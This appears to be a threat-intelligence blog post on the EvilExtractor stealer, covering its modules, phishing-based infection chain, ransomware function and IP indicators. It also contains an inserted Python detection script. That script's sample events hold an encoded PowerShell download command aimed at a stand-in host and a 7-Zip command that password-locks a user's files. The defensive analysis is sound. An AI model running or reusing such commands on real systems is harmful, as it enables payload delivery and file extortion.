SOCRadar® Cyber Intelligence Inc. | EvilExtractor Stealer Malware Attacks Peaked in March 2023
Apr 24, 2023

EvilExtractor Stealer Malware Attacks Peaked in March 2023

EvilExtractor (or Evil Extractor), a data theft tool, is trending in Europe and the United States due to an uptick in attacks.

EvilExtractor is sold by its developer(s), Kodex, on a subscription basis as if it were a legitimate tool; however, researchers have reported that it has been promoted to threat actors on various hacking forums since 2022.

According to Fortinet, the EvilExtractor stealer malware is being used by attackers in the wild, and its telemetry shows that deployment of the malware peaked in March 2023.

What Is EvilExtractor?

EvilExtractor malware affects Windows systems, and attackers utilize it mainly for stealing browser data and other sensitive information. Kodex released the malware in October 2022 and has since been updating it.

A forum post to advertise EvilExtractor.

For $59 per month, malicious actors get access to the seven attack modules included in the EvilExtractor tool, such as credential extraction, ransomware, and Windows Defender bypass.

The following modules are part of the EvilExtractor version used in these attacks:

  • Date time checking
  • Anti-Sandbox
  • Anti-VM
  • Anti-Scanner
  • FTP server setting
  • Steal data
  • Upload Stolen data
  • Clear log
  • Ransomware

How Does EvilExtractor Infect Systems?

Most infections were caused by a phishing campaign in which attackers dropped a Python executable. Fortinet discovered several attacks masquerading as account confirmation requests, each with a gzip-compressed executable attachment. This executable is designed to look like a legitimate PDF or Dropbox file.

When the target opens the file, a PyInstaller executable runs and launches a .NET loader; the loader in turn starts the EvilExtractor executable through a base64-encoded PowerShell script.

The malware will check the system time and hostname on initial launch to determine whether it is running in a virtual environment or a sandbox, in which case it will exit.

The data-stealing module of EvilExtractor downloads three additional Python components:

  • KK2023.zip: extracts cookies from several web browsers and also collects browsing history and saved passwords from a wider range of programs.
  • Confirm.zip: a keylogger that records keyboard input and saves it in a local folder for later exfiltration.
  • MnMs.zip: a webcam extractor that silently activates the webcam, captures video or images, and uploads them to the attacker’s FTP server, which Kodex rents.

The malware also steals many types of documents and media files from the Desktop and Downloads folders, takes screenshots, and sends all the stolen data to the attackers.

Kodex Ransomware

EvilExtractor also has a ransomware function that uses a PowerShell script extracted from the .NET loader.

The loader contains the ‘Kodex ransomware’ module, which can download a file (“zzyy.zip”) from evilextractor[.]com.

This tool utilizes 7-Zip to generate a password-secured archive of the victim’s files, making them inaccessible without the correct password.
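As an added defender-side illustration (not code from this post, Fortinet, or SOCRadar), the Python below scans constructed process-creation events for the two behaviours described above: the loader chain in which a lure executable launches base64-encoded PowerShell, and the ransomware step in which PowerShell drives 7-Zip to build a password-protected archive. The event field names, the double-extension lure filename and the sample command lines are assumptions made for the example.

```python
import base64
import re

# Constructed sample process-creation events (not real telemetry) that mirror the
# chain the post describes; the lure filename and URL are made up for the example.
ENCODED_SCRIPT = "(New-Object Net.WebClient).DownloadFile('http://example.invalid/zzyy.zip', 'zzyy.zip')"
SAMPLE_EVENTS = [
    {"parent": r"C:\Users\u\Downloads\Account_Confirmation.pdf.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -w hidden -enc "
                + base64.b64encode(ENCODED_SCRIPT.encode("utf-16-le")).decode()},
    {"parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Program Files\7-Zip\7z.exe",
     "cmdline": r"7z.exe a -pS3cret -mhe=on C:\Users\u\Desktop\locked.7z C:\Users\u\Desktop\*"},
    {"parent": r"C:\Windows\explorer.exe",  # benign: interactive use, no password switch
     "image": r"C:\Program Files\7-Zip\7z.exe",
     "cmdline": r"7z.exe a backup.7z C:\Users\u\Documents\*"},
]

ENC_FLAG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")
DOUBLE_EXT = re.compile(r"(?i)\.(?:pdf|docx?|xlsx?|zip)\.exe$")  # document-lookalike lure
ARCHIVE_PW = re.compile(r"(?i)(?:^|\s)-p\S*")  # 7-Zip -p[password] switch


def decode_encoded_command(cmdline: str):
    """Return the UTF-16LE script behind -EncodedCommand, or None if absent or invalid."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_event(event: dict) -> list:
    """Map one process-creation event to the EvilExtractor behaviours described above."""
    findings = []
    image, parent = event["image"].lower(), event["parent"].lower()
    if image.endswith("powershell.exe"):
        script = decode_encoded_command(event["cmdline"])
        if script is not None:
            findings.append("encoded-powershell")
            if re.search(r"(?i)download(?:file|string)|invoke-webrequest", script):
                findings.append("powershell-download")
    if DOUBLE_EXT.search(parent):
        findings.append("double-extension-parent")
    if image.endswith("7z.exe") and ARCHIVE_PW.search(event["cmdline"]):
        findings.append("password-archive")
        if parent.endswith("powershell.exe"):
            findings.append("archive-spawned-by-powershell")
    return findings
```

Running `analyze_event` over each entry in `SAMPLE_EVENTS` flags the first two events and returns nothing for the benign interactive 7-Zip run.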

Indicators of Compromise (IOC) Related to EvilExtractor

IP Addresses:

  • 45[.]87[.]81[.]184
  • 193[.]42[.]33[.]232

File Hashes:


Stay Updated on IOCs with SOCRadar

SOCRadar is constantly looking for potential threats to deliver actionable intelligence that will safeguard your organization. Check out the Threat Actor/Malware tab on the platform to stay up to date on the most recent threat activity, mentions, and indicators of compromise. You can also utilize the Threat Feed/IOC service to stay informed of new trends through easily customizable collections.

SOCRadar’s Threat Actor and Malware Intelligence tab.